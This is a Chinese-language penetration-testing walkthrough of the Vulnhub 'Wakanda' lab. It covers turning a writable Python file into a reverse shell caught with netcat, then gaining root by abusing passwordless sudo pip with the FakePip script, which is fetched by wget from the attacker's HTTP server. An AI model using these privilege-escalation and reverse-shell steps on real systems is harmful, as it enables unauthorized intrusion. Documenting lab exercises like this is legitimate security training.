渗透测试实战-Vulnhub-Wakanda

Wakanda Vulhub - 幕布php

Wakanda Vulhub
 
  • 接下来能够有两种方式获得devops的权限,一种是利用存在的python文件,利用编程,还有一种是利用msfvenom生成payload,将其放入原来的py文件,注释掉原来的代码,后面的侦听过程都是一致的
  • 第一种
    • 由此,看出这个文件的所属是devops,属组是developers,任何人都能修改,能够进行修改做为一个反向shell
      • 这里应该是socket编程,让它与攻击机的1235端口有链接
      • 而后在kali上侦听该端口,nc -lvvp 1235
        • 成功进入devops的shell
  • 想办法提权
    • 查看devops的root权限,发如今nopass的状况下只有pip可使用
      • sudo -l命令
    • 关于pip命令,有一个漏洞能够利用,GitHub上有一个利用脚本Fakepip https://github.com/0x00-0x00/FakePip
    • 利用pip升级漏洞
      • 进行修改,主要是IP,监听的端口能够自行选择是否修改,但必定与后面监听的端口一致
        • 如图,默认的端口是 13372
      • 而后在当前的目录下利用python开启一个简单的http服务,提供靶机下载,python -m SimpleHTTPServer 8888
        • 而后在靶机上,wget http:192.168.56.103:8888/setup.py
      • 而后在靶机上使用root权限执行sudo /usr/bin/pip install . --upgrade --force-reinstall 执行这个EXp
      • 得到root权限后,查看根目录,获得最后一个flag
  • 至此找到了全部的flag 并得到了root权限




以上内容整理于
幕布
相关文章
相关标签/搜索